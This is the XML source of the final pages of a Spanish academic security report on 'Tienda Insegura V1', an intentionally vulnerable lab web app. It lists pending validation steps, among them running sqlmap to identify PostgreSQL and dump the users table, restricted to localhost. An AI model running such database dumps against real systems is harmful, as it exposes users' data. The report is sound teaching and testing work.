    <w:p w14:paraId="26B1490D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>D.2 Validaciones dinámicas pendientes o por documentar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4C51B5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Levantar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>compose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> full up -d --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">y guardar la salida de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>compose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE792B9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Ejecutar scripts/verificar-laboratorio.ps1 y conservar su resultado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF4BAB8" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Reproducir las pruebas A01 a A10 únicamente contra localhost y agregar las figuras 2 a 13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ABF3D1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejecutar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">, identificar PostgreSQL y guardar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la tabla usuarios como figuras 14 y 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B58400" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Adjuntar el reporte de OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Dependency-Check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y las salidas relevantes de los logs del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3295BD22" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Confirmar que los puertos publicados permanecen enlazados a 127.0.0.1 y que la V1 no está accesible desde otra má</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="19"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>quina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35857F9E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>D.3 Criterio de cierre documental</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7DA810" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La documentación de la V1 se considera completa cuando cada procedimiento tenga una evidencia real, numerada y legible, y cuando la conclusión refleje únicamente resultados comprobados. Las capturas deben </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>mostrar la dirección localhost, el comando o acción ejecutada y la respuesta obtenida.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidSect="00034616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134" w:right="1134" w:bottom="1020" w:left="1247" w:header="397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B32D0B" w14:textId="77777777" w:rsidR="001E2383" w:rsidRDefault="001E238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9D2FD3A" w14:textId="77777777" w:rsidR="001E2383" w:rsidRDefault="001E238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7C640E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
    <w:pPr>
      <w:pStyle w:val="Piedepgina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3D8681" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr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4762"/>
      <w:gridCol w:w="4762"/>
    </w:tblGrid>
    <w:tr w:rsidR="00217A21" w14:paraId="373EEF15" w14:textId="77777777">
      <w:trPr>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4762" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="385DC660" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="es-PE"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00742FE9">
            <w:rPr>
              <w:color w:val="6B7280"/>
              <w:sz w:val="16"/>
              <w:lang w:val="es-PE"/>
            </w:rPr>
            <w:t>Leonardo Travezaño Rodríguez | Seguridad Informática</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4762" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="0090349C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
          <w:pPr>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="6B7280"/>
              <w:sz w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Página </w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText>PAGE</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="6B7280"/>
              <w:sz w:val="16"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="6B7280"/>
              <w:sz w:val="16"/>
            </w:rP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3AD57" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
    <w:pPr>
      <w:pStyle w:val="Piedepgina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7B1054" w14:textId="77777777" w:rsidR="001E2383" w:rsidRDefault="001E238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8854CFD" w14:textId="77777777" w:rsidR="001E2383" w:rsidRDefault="001E238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F3AEF8" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
    <w:pPr>
      <w:pStyle w:val="Encabezado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FCA103" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D9E0EA"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="es-PE"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00742FE9">
      <w:rPr>
        <w:b/>
        <w:color w:val="20385F"/>
        <w:sz w:val="17"/>
        <w:lang w:val="es-PE"/>
      </w:rPr>
      <w:t>Tienda Insegura V1 | Informe Técnico Final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8B6F67" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
    <w:pPr>
      <w:pStyle w:val="Encabezado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4825"/>
    <w:rsid w:val="001E2383"/>
    <w:rsid w:val="00217A21"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003B4509"/>
    <w:rsid w:val="003C79AB"/>
    <w:rsid w:val="00742FE9"/>
    <w:rsid w:val="00A95B94"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00AE7CBA"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00DC6879"/>
    <w:rsid w:val="00FC693F"/>
    <w:rsid w:val="00FD0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545F234"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{4CE58F5E-2F7A-40E5-91D9-43713E15F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02020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0385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C54E3B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6F50"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3243F"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Liberation Mono" w:hAnsi="Liberation Mono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76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24</Pages>
  <Words>5457</Words>
  <Characters>30019</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>250</Lines>
  <Paragraphs>70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Informe Técnico Final - Tienda Insegura V1</vt:lpstr>
      <vt:lpstr/>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>35406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Final - Tienda Insegura V1</dc:title>
  <dc:subject>Aplicación web intencionalmente vulnerable basada en OWASP Top 10:2025</dc:subject>
  <dc:creator>Leonardo Benjamín Travezaño Rodríguez</dc:creator>
  <cp:keywords>OWASP, SQL Injection, RCE, IDOR, Docker, Spring Boot, PostgreSQL, sqlmap</cp:keywords>
  <dc:description>Documento académico para laboratorio local autorizado.</dc:description>
  <cp:lastModifiedBy>Jesus Mamani Salas-Ing. en Informatica y Sistemas</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-02T15:34:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>